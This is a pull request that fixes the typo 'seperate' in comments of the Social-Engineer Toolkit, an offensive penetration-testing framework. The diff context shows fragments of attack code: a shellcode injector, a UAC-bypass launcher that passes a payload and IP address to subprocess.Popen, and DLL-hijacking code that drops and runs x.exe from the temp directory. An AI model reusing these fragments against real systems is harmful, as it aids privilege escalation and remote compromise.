### PR TITLE
docs: Fix simple typo, seperate -> separate

### DIFF
--- a/src/payloads/set_payloads/multi_pyinjector.py
+++ b/src/payloads/set_payloads/multi_pyinjector.py
@@ -2,7 +2,7 @@
 # The Social-Engineer Toolkit Multi-PyInjector revised and simplified version.
 # Version: 0.4
 #
-# This will spawn only a seperate thread per each shellcode instance.
+# This will spawn only a separate thread per each shellcode instance.
 #
 # Much cleaner and optimized code. No longer needs files and is passed via
 # command line.

--- a/src/payloads/set_payloads/shell.py
+++ b/src/payloads/set_payloads/shell.py
@@ -842,7 +842,7 @@ try:
                     # sleep 0.5 seconds
                     time.sleep(0.5)
 
-                    # this will spawn the shell in a seperate process thread as
+                    # this will spawn the shell in a separate process thread as
                     # SYSTEM
                     def getsystem(set_payload, ipaddr):
                         # generate a random string between 10 and 15 length
@@ -978,7 +978,7 @@ try:
                     # set payload
                     upload_file(set_payload)
 
-                    # this will spawn the shell in a seperate process thread
+                    # this will spawn the shell in a separate process thread
                     def launch_uac(bypassuac, set_payload, ipaddress):
                         subprocess.Popen(
                             "%s /c %s %s" % (bypassuac, set_payload, ipaddress), shell=True).wait()

--- a/src/webattack/dll_hijacking/hijacking.c
+++ b/src/webattack/dll_hijacking/hijacking.c
@@ -35,7 +35,7 @@ host=int(len(ipaddr)+1) * "X"
 filewrite.write(data.replace(str(host), ipaddr+"\x00", 1))
 filewrite.close()
 
-Once the DLL is executed and the payload downloaded from the SET web server, a seperate thread is created
+Once the DLL is executed and the payload downloaded from the SET web server, a separate thread is created
 and the payload executed. Once closed and the thread terminates, the executable should be deleted however
 this isn't 100 percent.
 
@@ -200,7 +200,7 @@ BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
 	// print our temp directory to our buffer we created 'path'
 	sprintf(path, "%s\\x.exe", tmpdir);
 	// here is where we start a new process and execute a command
-	// this was the cleanest method as we create a complety seperate instance
+	// this was the cleanest method as we create a complety separate instance
 	STARTUPINFO si;
 	PROCESS_INFORMATION pi;
 


### PR DESCRIPTION
There is a small typo in src/payloads/set_payloads/multi_pyinjector.py, src/payloads/set_payloads/shell.py, src/webattack/dll_hijacking/hijacking.c.

Should read `separate` rather than `seperate`.

